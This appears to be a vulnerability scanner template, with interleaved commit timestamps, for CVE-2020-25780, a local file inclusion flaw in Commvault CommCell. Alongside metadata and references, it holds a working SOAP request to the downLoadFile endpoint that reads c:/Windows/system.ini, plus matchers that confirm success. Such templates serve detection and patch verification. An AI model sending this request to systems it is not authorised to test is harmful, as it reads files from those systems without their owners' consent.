2021-11-29 14:32:59 +00:00
id : CVE-2020-25780
info :
2022-07-26 13:45:11 +00:00
name : Commvault CommCell - Local File Inclusion
2021-11-29 14:32:59 +00:00
author : pdteam
severity : high
2022-07-26 13:45:11 +00:00
description : CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder.
2021-11-29 14:32:59 +00:00
reference :
- https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html
2022-05-17 09:18:12 +00:00
- http://kb.commvault.com/article/63264
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-25780
2021-11-29 14:34:36 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-11-29 14:34:36 +00:00
cve-id : CVE-2020-25780
cwe-id : CWE-22
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,commvault,lfi
2021-11-29 14:32:59 +00:00
requests :
- method : POST
path :
- "http://{{Host}}:81/SearchSvc/CVSearchService.svc"
headers :
Cookie : Login
soapaction : http://tempuri.org/ICVSearchSvc/downLoadFile
content-type : text/xml
body : |
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:downLoadFile>
<tem:path>c:/Windows/system.ini</tem:path>
</tem:downLoadFile>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition : and
matchers :
- type : word
words :
- "downLoadFileResult"
- type : status
status :
2022-07-26 13:45:11 +00:00
- 200
# Enhanced by mp on 2022/07/15